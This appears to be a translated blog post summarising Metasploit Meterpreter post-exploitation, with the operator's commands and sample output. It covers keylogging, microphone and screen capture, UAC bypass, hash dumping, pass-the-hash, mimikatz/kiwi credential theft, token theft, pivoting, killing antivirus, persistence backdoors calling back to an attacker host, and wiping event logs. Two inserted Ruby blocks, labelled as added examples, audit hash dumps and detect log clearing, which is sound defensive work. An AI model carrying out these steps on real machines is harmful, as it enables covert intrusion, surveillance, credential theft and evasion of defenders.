MSF post-exploitation summary
2022-06-30 17:58:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】
Files
1. File interaction commands
| ID | Command | Description |
|---|---|---|
| 1 | cat | Read file contents |
| 2 | cd | Change directory on the target |
| 3 | cp | Copy a file to a destination |
| 4 | mv | Move a file to a destination |
| 5 | chmod | Modify file permissions (e.g. chmod 777 shell.elf) |
| 6 | del / rm | Delete a file on the target |
| 7 | dir | List the target directory |
| 8 | mkdir | Create a directory on the target |
| 9 | rmdir | Remove a directory on the target |
| 10 | edit | Edit a file |
| 11 | getlwd | Print the local working directory |
| 12 | getwd | Print the target working directory |
| 13 | lcd | Change the local directory |
| 14 | lls | List the local directory |
| 15 | ls | List files in the target directory |
| 16 | lpwd | Print the local working directory |
| 17 | pwd | Print the working directory on the target |
| 19 | search | Search for files (see search -h for details) |
2. Uploading and downloading files
| Command | Description |
|---|---|
| upload | Upload a file to the target |
| download | Download a file from the target |
Capturing information from the controlled host
【1】 Capture the screen
The screen can be captured with the following command:
```
screenshot
```
Returned result:
```
meterpreter > screenshot
Screenshot saved to: /home/adian/ooTGibPg.jpeg
```
【2】 Capture the microphone
Command:
```
run sound_recorder
```
It records 30 seconds of audio by default; for a longer recording, use the -l parameter.
```
meterpreter > run sound_recorder
[*] Saving recorded audio to /root/.msf4/logs/scripts/sound_recorder/WIN-ITNJLFM93P3_20210520.1422
[*] Recording a total of 0m 30s
```
Capture keystrokes
Command:
```
run post/windows/capture/keylog_recorder
```
Result:
```
[*] Executing module against WIN-ITNJLFM93P3_1.wav
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20210520231706_TestWin7_10.10.10.132_host.windows.key_377741.txt
[*] Recording keystrokes...
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
```
Alternatively, use
```
keyscan_start
```
After capturing, use
```
keyscan_dump
```
to retrieve the recorded content. To stop, use the following command:
```
keyscan_stop
```
Privilege escalation
Use the following command to check the current privilege level:
```
getuid
```
Here we already have SYSTEM privileges:
```
Server username: NT AUTHORITY\SYSTEM
```
If we do not have SYSTEM privileges, we can try to escalate directly with the following command:
```
getsystem
```
Once this escalation failed for me, so I tried escalating with a UAC bypass instead.
First, run
```
bg
```
to keep the session alive in the background. Then try the following two modules in turn:
```
use exploit/windows/local/bypassuac            # This module creates multiple files on the target machine and is recognised by antivirus software, so its success rate is very low.
use exploit/windows/local/bypassuac_injection  # This module runs as a reflective DLL directly in memory and never touches the target's disk, which lowers the chance of antivirus detection.
```
When I used these two modules, the first did not succeed but the second did.
Harvesting usernames and password hashes
Windows stores password hashes as LAN Manager (LM), NT LAN Manager (NTLM) or NT LAN Manager v2 (NTLMv2).
In msf, the hashdump command retrieves the hashes of all user accounts on the system:
```
hashdump
```
This command requires SYSTEM privileges.
Pass-the-hash login
We use the windows/smb/psexec module to pass the hash. The obtained hash is split into SMBUser and SMBPass. For example, given the hash
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
set SMBUser to
```
Administrator
```
and SMBPass to
```
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
```
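The hashdump line format above (user:rid:lmhash:nthash:::) is also what a defender audits after a dump: the LM value aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and the NT value 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, i.e. a blank password. The following parser and audit is an added example, not code from the original post; the sample dump is constructed.

```ruby
# Added example (not from the original post): audit a hashdump in the
# user:rid:lmhash:nthash::: format for weak credential storage.
# Both constants are well known: the LM value written when no LM hash is
# stored, and the NT hash of the empty string. Sample input is constructed.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

HashdumpEntry = Struct.new(:user, :rid, :lm, :nt) do
  # A real LM hash means the weak LM format is still being stored.
  def lm_stored?
    lm.downcase != EMPTY_LM
  end

  # NT hash of "" means the account has a blank password.
  def blank_password?
    nt.downcase == EMPTY_NT
  end
end

# Parse one hashdump line; nil for lines that do not match the format.
def parse_hashdump_line(line)
  m = line.strip.match(/\A([^:]+):(\d+):(\h{32}):(\h{32}):::\z/)
  m && HashdumpEntry.new(m[1], m[2].to_i, m[3], m[4])
end

# Return [user, finding] pairs a defender would want to act on.
def audit_hashdump(text)
  findings = []
  text.each_line do |line|
    e = parse_hashdump_line(line)
    next unless e
    findings << [e.user, 'blank password'] if e.blank_password?
    findings << [e.user, 'LM hash stored'] if e.lm_stored?
    # RID 500 is always the built-in Administrator, whatever it was renamed to.
    findings << [e.user, 'built-in Administrator (RID 500) renamed'] if e.rid == 500 && e.user != 'Administrator'
  end
  findings
end

# Constructed sample: the line quoted in the text plus two made-up accounts
# (the hex values for "bob" are arbitrary, not real hashes).
SAMPLE_DUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  bob:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
DUMP

puts audit_hashdump(SAMPLE_DUMP).map { |u, f| "#{u}: #{f}" } if __FILE__ == $0
```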
Obtaining plaintext passwords
Under Meterpreter, use Mimikatz to obtain passwords. First load the Mimikatz module:
```
load mimikatz
```
The output is as follows:
```
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
```
In msf6, mimikatz has been replaced by kiwi:
```
The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
```
The help documentation is as follows:
```
Kiwi Commands
=============
Command                Description
-------                -----------
creds_all              Retrieve all credentials (parsed)
creds_kerberos         Retrieve Kerberos creds (parsed)
creds_livessp          Retrieve Live SSP creds
creds_msv              Retrieve LM/NTLM creds (parsed)
creds_ssp              Retrieve SSP creds
creds_tspkg            Retrieve TsPkg creds (parsed)
creds_wdigest          Retrieve WDigest creds (parsed)
dcsync                 Retrieve user account information via DCSync (unparsed)
dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create   Create a golden kerberos ticket
kerberos_ticket_list   List all kerberos tickets (unparsed)
kerberos_ticket_purge  Purge any in-use kerberos tickets
kerberos_ticket_use    Use a kerberos ticket
kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam           Dump LSA SAM (unparsed)
lsa_dump_secrets       Dump LSA secrets (unparsed)
password_change        Change the password/hash of a user
wifi_list              List wifi profiles/creds for the current user
wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)
```
kiwi is more comprehensive and essentially retains all of mimikatz's functionality. For example:
```
meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
Username  Domain           LM                                NTLM                              SHA1
--------  ------           --                                ----                              ----
test      WIN-ITNJLFM93P3  aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709
```
Token impersonation
steal_token
Using a stolen token, you can impersonate another user on the network, for example to elevate privileges or to create users and groups. When a user logs in to Windows, they are given an access token as part of the authentication session; an intruder who needs to perform operations as a domain administrator therefore needs to use that user's token.
Use the ps command to view the running processes and their corresponding users:
```
ps
```
The syntax for stealing a token is:
```
steal_token PID
```
From then on, commands execute as the stolen user.
incognito
Load this module first:
```
load incognito
```
Run
```
list_tokens -u
```
to view all available tokens. Use the following command to impersonate one:
```
impersonate_token domain\\name
```
Note the two backslashes.
Recovering files deleted on the target host
Use the module
```
post/windows/gather/forensics/recovery_files
```
Set DRIVE (the drive letter) and the session ID, then run it to recover the files.
Using the Meterpreter shell as a pivot
Use the following command to get the current subnets:
```
run get_local_subnets
```
The results are as follows:
```
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
```
Here the post module autoroute can be used to configure routing automatically:
```
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against WIN-ITNJLFM93P3
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth
```
We can also add routes manually. First put the shell in the background:
```
background
```
Then add the route manually:
```
route add <subnet> <netmask> <session ID>
```
Meterpreter scripts
Usage:
```
run <script path or name>
```
Process migration
Script:
```
post/windows/manage/migrate
```
Or use migrate to move the session into the specified PID:
```
migrate PID
```
Turning off antivirus software
```
run killav
```
In msf6 this can still be used, but you will be warned that it is deprecated:
```
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
```
In testing, it could not identify Huorong antivirus; however, the MS17-010 attack was blocked by Huorong.
Viewing all traffic on the target machine
Use packetrecorder to capture traffic, which can then be analysed in Wireshark:
```
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-ITNJLFM93P3_20210521.5655/WIN-ITNJLFM93P3_20210521.5655.cap
[*] Packet capture interval is 30 Seconds
```
Gathering system information
The scraper script enumerates all the information a user would want:
```
meterpreter > run scraper
[*] New session on 10.10.10.132:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\AoxTqVci.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\xaFqszRg.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\OqrObWNV.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\rAJZLqAf.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\esDrHZoB.reg)
[*] Cleaning HKU
[*] Completed processing on 10.10.10.132:445...
```
Creating persistent backdoors
Use the persistence and metsvc scripts to create persistent backdoors:
```
meterpreter > run persistence
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-ITNJLFM93P3_20210521.0320/WIN-ITNJLFM93P3_20210521.0320.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444
[*] Persistent agent script is 99668 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ArDebnpVV.vbs
[*] Executing script C:\Windows\TEMP\ArDebnpVV.vbs
[+] Agent executed with PID 2524
```
Run
```
run persistence -h
```
to see the help and create a customised backdoor.
```
meterpreter > run metsvc
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Windows\TEMP\nzDwNmYr...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
```
Use multi/handler to listen and establish the session. Pay attention to the handler's payload setting at this point, otherwise the session will close.
Upgrading a command-line shell to Meterpreter
Run directly:
```
sessions -u ID
```
Removing traces
Use irb directly:
```
meterpreter > irb
[*] Starting IRB shell...
>>
```
At the >> prompt, select the log to delete:
```
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('directory service')
log = client.sys.eventlog.open('dns server')
log = client.sys.eventlog.open('file replication service')
```
Finally, clear it:
```
log.clear
```
Or use clearev:
```
meterpreter > clearev
[*] Wiping 299 records from Application...
[*] Wiping 939 records from System...
[*] Wiping 230 records from Security...
```
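From the defender's side, the wipe shown above is itself detectable: clearing the Security log writes Event ID 1102 as the first record of the fresh log, and clearing the System or Application log writes Event ID 104 to the System log, both from provider Microsoft-Windows-Eventlog. The following detector is an added example, not code from the original post; the event records are constructed in a simplified hash form.

```ruby
# Added example (not from the original post): detect event-log wiping from the
# defender's side. Clearing the Security log leaves Event ID 1102 ("The audit
# log was cleared") as the first record of the fresh log; clearing the System
# or Application log leaves Event ID 104 in the System log. Both come from the
# provider Microsoft-Windows-Eventlog. Events are constructed in a simplified
# hash form here, not real exported records.
require 'time'

LOG_CLEAR_SIGNATURES = [
  { log: 'Security', provider: 'Microsoft-Windows-Eventlog', id: 1102 },
  { log: 'System',   provider: 'Microsoft-Windows-Eventlog', id: 104 }
].freeze

def log_cleared_event?(ev)
  LOG_CLEAR_SIGNATURES.any? do |sig|
    ev[:log] == sig[:log] && ev[:provider] == sig[:provider] && ev[:event_id] == sig[:id]
  end
end

# Group clear events that fall within `window` seconds of each other: clearev
# wipes Application, System and Security back to back, so one burst hitting
# several logs is a much stronger signal than an admin clearing a single log.
def detect_log_clearing(events, window: 60)
  hits = events.select { |e| log_cleared_event?(e) }.sort_by { |e| Time.iso8601(e[:time]) }
  bursts = []
  hits.each do |e|
    last = bursts.last
    if last && Time.iso8601(e[:time]) - Time.iso8601(last.last[:time]) <= window
      last << e
    else
      bursts << [e]
    end
  end
  bursts.map do |b|
    logs = b.map { |e| e[:cleared] || e[:log] }.uniq  # 104 names the cleared log; 1102 is always Security
    { start: b.first[:time], user: b.first[:user], cleared_logs: logs,
      severity: logs.size > 1 ? 'high' : 'medium' }
  end
end

# Constructed sample: one normal logon, a clearev-style burst, and a lone clear a week later.
SAMPLE_EVENTS = [
  { time: '2021-05-21T03:19:50Z', log: 'Security', provider: 'Microsoft-Windows-Security-Auditing', event_id: 4624, user: 'test' },
  { time: '2021-05-21T03:20:05Z', log: 'System',   provider: 'Microsoft-Windows-Eventlog', event_id: 104,  cleared: 'Application', user: 'SYSTEM' },
  { time: '2021-05-21T03:20:06Z', log: 'System',   provider: 'Microsoft-Windows-Eventlog', event_id: 104,  cleared: 'System',      user: 'SYSTEM' },
  { time: '2021-05-21T03:20:07Z', log: 'Security', provider: 'Microsoft-Windows-Eventlog', event_id: 1102, cleared: 'Security',    user: 'SYSTEM' },
  { time: '2021-05-28T09:00:00Z', log: 'System',   provider: 'Microsoft-Windows-Eventlog', event_id: 104,  cleared: 'Application', user: 'admin' }
].freeze

detect_log_clearing(SAMPLE_EVENTS).each { |alert| puts alert.inspect } if __FILE__ == $0
```

Forwarding logs to a collector before they can be cleared keeps the wiped records themselves; this check only needs the clear markers that survive locally.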